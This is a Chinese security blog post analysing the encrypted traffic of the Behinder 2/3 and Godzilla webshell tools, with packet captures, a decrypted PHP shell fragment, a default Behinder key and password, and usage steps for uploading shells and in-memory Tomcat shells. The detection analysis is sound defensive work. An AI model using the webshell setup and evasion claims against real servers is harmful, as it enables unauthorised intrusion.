冰蝎2和3及哥斯拉Godzilla特征分析 – 作者:Vendetta2

冰蝎2

冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端。

冰蝎工具通信原理

冰蝎的通信过程可以分为两个阶段：

密钥协商

加密传输

1）第一阶段-密钥协商

a.php

攻击者通过GET方式请求服务器密钥；

GET /hackable/uploads/shell.php?pass=300 HTTP/1.1

当我们输入命令操作后，请求方式就会变成POST

POST /hackable/uploads/shell.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=lsgi7fb09enqcn3svmti4eqbo7; path=/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.0.129:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 1112
​
hxx/2GPvW+iHRI+j7FKIjpbHv6JcLQzyNs8uQ1IPDTB2xcS5+oKiaSKujjcZ/uYLEwn6oA8a1YehtGbT9arlXe3LaA0kig9BITcK3iZZKYhjpK0/ziTfTa5CnU3lfrnmCcadnmtgUKyTZDdb93DSqwyGn3cFb7BuIPkdCu6SpLov3+EExlHPbY/+6PiiDIpWGCxzkEIwli6zJiS8fa4fSxYcr/e0viSLVI3eXHAvhcohXLsVbWV5HmZMovp4EHYkcofLdR7fjx+NZbIfBOTZfzbOTOXBRBI2GBEUZG4uzi7s0xeHzUWeKf/n+CjrCs1OgYT893Q5KyRSr9+wn3Gi8JfDYPKCady

b.jsp

先通过GET方法，向服务器请求随机密钥

GET /s.jsp?pass=987 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
​
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D89B13E292E0D8D7CD9433522F293EDB; Path=/; HttpOnly
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 16   
Date: Wed, 18 Nov 2020 12:32:58 GMT
​
9e39ae1ad6ee9e32  //服务器返回的密钥

同样输入命令后，也和PHP一样，请求方式就变成了POST

POST /s.jsp HTTP/1.1
Content-Type: application/octet-stream
Cookie: JSESSIONID=D89B13E292E0D8D7CD9433522F293EDB; Path=/; HttpOnly
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 8556
​
75Zv64K/CymLAnv5UhDhKfJdj58rU1o/0yZ7D0XlJU7MgTbzaA4zrvImnNs1Y1cmNPGAdxaaEaYxvasJSp2sCHk5TPv+fWunDMvZWoBqjcnkHGMYyohZpH1v7OvWcdAZPg7CIL87y9HPc2lydWTiBVspavD0FkRVY7/XmeWw7m/O42+SE28iQSgyLf/

2）服务器使用密钥

使用随机数MD5的高16位作为密钥，存储到会话的 $_SESSION 变量中，并返回密钥给攻击者。

3）解密

刚才php请求密钥的数据包中获取到的密钥：

95c4e8e4eef4b1ac  //服务器返回的密钥

a.请求密文b.输入密钥和请求密文，解密后为 base64 编码

c.base64解码

@error_reporting(0);
function main($content)
{
$result = array();
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode($content);
$key = $_SESSION['k'];
echo encrypt(json_encode($result),$key);
}
​
function encrypt($data,$key)
{
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15]; 
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}
}$content="327c829b-f4d3-41eb-a251-d561e01011ec";
main($content);

4）特征总结

a.ACCEPT字段

冰蝎2默认Accept字段的值很特殊,而且每个阶段都一样

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

b.UA字段

冰蝎内置了十余种 UserAgent ，每次连接 shell 会随机选择一个进行使用。但都是比较老的，容易被检测到，但是可以在burp中修改ua头。

c.Content-Length

Content-Length: 16, 16就是冰蝎2连接的特征

冰蝎3

对比冰蝎2，冰蝎3取消动态密钥获取，目前很多waf等设备都做了冰蝎2的流量特征分析，所以3取消了动态密钥获取；只有在无动态密钥交互失败后，才会进入常规的密钥交互阶段。

<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; 
//该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
$_SESSION['k']=$key;

密钥生成可以看出，使用密码的md5结果的前16位。

特征分析

php抓包

看包没有发现什么特征，但是可以发现它是POST请求的

1）Accept头有application/xhtml+xmlapplication/xmlapplication/signed-exchange属于弱特征

2）ua头该特征属于弱特征。通过burp可以修改,冰蝎3.0内置的默认16个userAgent都比较老。现实生活中很少有人使用，所以这个也可以作为waf规则特征。

POST /hackable/uploads/shell.php HTTP/1.1
Content-Type: text/html;charset=utf-8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.0.132:777
Connection: keep-alive
Content-Length: 1432
Cookie: PHPSESSID=peimnpkc4hi70akr2seroj6mi2
​
3Mn1yNMtoZViV5wotQHPJtwwj0F4b2lyToNK7LfdUnN7zmyQFfx/zaiGwUHg+8SlXZemCLBkDIvxiBIGd6bgOEiZtNpn6YmnWiiaCBNbXkC5JWFTARrD8lCOCQ4ZVFjsJFDaAOwzinbqne/oYuNwWjQvKM9ii2RE/b+Gc+ya2f4+OIDU2Wk/QSIL7GOAoyaUYZSq4bL2wmX5RnP1Lbf7S+TAy3K7JPruBiZeZGC/ay14vUj4+IgmNHwEAzWl3DNIsL1yhH4Do5FI8HwZpG5XnrZwpKdFIEgN4GKmcDODTdO2pj8DVXCwes3m+v/wRykVd++xsex2EkGn9p0SgL+GpXlGg6Ol

jsp抓包

特征分析Content-Type: application/octet-stream 这是一个强特征查阅资料可知octet-stream的意思是，只能提交二进制，而且只能提交一个二进制，如果提交文件的话，只能提交一个文件,后台接收参数只能有一个，而且只能是流（或者字节数组）；很少使用。

POST /3.jsp HTTP/1.1
Content-Type: application/octet-stream
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Cache-Control: no-cache
Pragma: no-cache
Host: x.x.x.x:888
Connection: keep-alive
Content-Length: 11864
Cookie: JSESSIONID=F063F33F5F8BE2F3C75311C7128E70D1
​
F1w4ahdSJGUxG3t11sfr6qxbThq9VnL7i6K1/NzHsb0s9eQIfj2qDW/r5OeNJjI0U/BrUp2pHtrtCkdiUeJVIKFzCMSfe8yhEddJFJideje6Eb0dtrHHd9YYaZcxqQL2FFusmCXFICrCh3MsG+BYZHKbNVkWJrsTiu/1VBPV9CBkJzPBO4aH98EBFycyQbpGCHjAPaZmbaIIVWenbm642/xYr85uQ5/K74vlQ9wR5iGLZvyH8WZOF0YpqhxjkApKeShoSGX/C87NiqMTVAB+DcFNf4HaitS1o7Q6kXnUET00L5irn+WdNis2mvNEzr+DGay6LSKKD9kDl6iTKD/1aiXfk5EgH4PfR0/aXCEKTsFW29So6wbhR6u4H3/

Godzilla特征分析

介绍

哥斯拉是一个基于流量、HTTP全加密的webshell管理工具相对于蚁剑，冰蝎；哥斯拉具有以下优点。

全部类型的shell均过市面所有静态查杀

流量加密过市面全部流量waf

Godzilla自带的插件是冰蝎、蚁剑不能比拟的

使用

（1）Godzilla的运行需要java环境。在cmd下切换到哥斯拉所在目录，输入

java -jarGodzilla.jar

此时会在同目录下生成data.db数据库存放数据（2）Godzilla的webshell可以自定义生成操作方法：管理-生成所需的webshell，哥斯拉支持jsp、php、aspx等多种载荷java和c#的载荷原生实现AES加密

PHP使用亦或加密（3）将生成的webshell上传到目标机器，然后在Godzilla目标栏添加相应的url

PHP连接特征

（1）php_XOR_BASE64

设置代理，用burp抓包。截取到特征发现请求都含有”pass=”第一个包

POST /hackable/uploads/base.php HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 23275
Connection: close
​
pass=KX4nWAFVJ005aWdeUVosCjpuL0k7YApWKGVGfHFTUXg5WDNFOwszSQEDAVVRWjdGKHU3RwBgLEkGRgV5e3cgVCpxP0YBVVBRB3d3WlFZJ0c5bjdcAVEGUgB2BEh%2BXQJeMGMdQAMKN2M
BAmALeE1UWjpuK1wsUjN%2FAVx7RGhzNFwpBFRcBn9YTylIXkJ9Q1F4J2cKVyt7IF4CZmxVeXczVTYGM2Q3CA1pN11GW2taDUQ6bitKOgpYTjlmAFRrWSdJOWE3QAFRK10zZQQCUVo3XyhuFn4hUSBeKnJ0VXt3IFQycS8FAX8nQwAADERRczdGOwQvWAEKN1ICaXxdeW
ASfSBfJFcreyMAJ2BafHFdIFQqdSdJOGAzCABcAVVrWSdJOWI8ADBvVFMBA2deeXM3ATphHXcGb1RTKHJeQn1DUXgFZ1V7JmkRVAdmAFhWcw1FAV8nWQdgI1EAAntUUAcjXwFaXFk7YC9VOXZZS3l3DQQnZwp
XK3sgXgJmbF17YSNeAmEdXDoKNw0CaXsCUU0GXTpYCUc7YC9DOwMMRWhjVFU6WyNKOG8zSQBYVkJ5bBJ9IF8kVyt7IF4qcnRVY3NQQTlxCUkpewVQBml3WlE

第二个包

POST /hackable/uploads/base.php HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 51
Connection: close
​
pass=AWEzAAN%2FWFI3XHNGaGBQWDEHPwY4fSQAM2AIDw%3D%3D

（2）php_XOR_RAW

执行ls和cat命令，命令虽然不同，但是发现请求中都含有一样的

:•T[6•
L9e

ls命令的包

POST /hackable/uploads/g.php HTTP/1.1
Cookie: PHPSESSID=oo9hn9d3uqq7661o3oldu0ojo7;
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 56
Connection: close
​
:•T[6•
L9e•[aqP•)[T\••O9t

cat命令的包

POST /hackable/uploads/g.php HTTP/1.1
Cookie: PHPSESSID=oo9hn9d3uqq7661o3oldu0ojo7;
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 72
Connection: close
​
:•T[6•
L9e•h•_8D0c+r•}•L6[gYccY
)[T\••O9t

当以为这就是特征时就大错特错了，这只是这一次连接所含有的特征

jsp连接特征

（1）java_AES_BASE64

POST /gejs.jsp HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 33035
Connection: close
​
pass=0%2FMHwbBP6vuX0WyYztOU9DrUPcD0Zwx0KhArobwwHBDld91Y8xrUqPxo40dKoSbGd%2FxDF4yJopsUIHMI8NMfFUl0oxBzWPyMdTmxAntagmMGLGiqB1ckbl5G%2FlapnewWrvhhdqtj0eT2zvUes%2Bg6yhFGVjLstoOdJxkYPY6XB70AeffugDlCkUYAyHyrTymPocUs14sKD5ItAn5147goo9TAdBH0kgSNlxbqxMqTPbgjKljsvC53fFB%2BO5jKUBCBvsCR1W%2FLhPA42qp1e%2Fl0cmUohwSAT3N0s9r%2FzRVlB3lQkXnV895dz48DyPbYjJp%2Bhpf1qFjbCy1o8Zd771ObGbKvWr1O5PZOTNKBu
​
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=509B4522D1A54112AA93CCAE0311FEFD; Path=/; HttpOnly
Content-Type: text/html
Content-Length: 0
Date: Wed, 18 Nov 2020 15:04:32 GMT
Connection: close

与php请求一样都含有”pass=”而且发起连接时服务器返回的Content-Length是0

（2）java_AES_RAW

POST /rwj.jsp HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 23360
Connection: close
​
Óó•Á°Oêû•Ñl•ÎÓ•ô:Ô=Àôg•t*•+¡¼0••åwÝXó•Ô¨ühãGJ¡&ÆwüC•••¢••s•ðÓ••It£•sXü•u9±•{Z•c•,hª•W$n^FþV©•ì•®øav«cÑäöÎõ•³è:Ê
​
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1C26762D96A561D4A63BDE104E22930C; Path=/; HttpOnly
Content-Type: text/html
Content-Length: 0
Date: Wed, 18 Nov 2020 15:19:56 GMT
Connection: close

内存马

内存shell模块实现了在tomcat中上传一个哥斯拉的马或者冰蝎、菜刀的马。甚至是上传regeorg建立http隧道。在这里我选择上传一个冰蝎马。然后在冰蝎连接，成功连接。内存shell 无日志，会在tomcat重启后消失。

来源：freebuf.com 2020-12-19 23:35:53 by: Vendetta2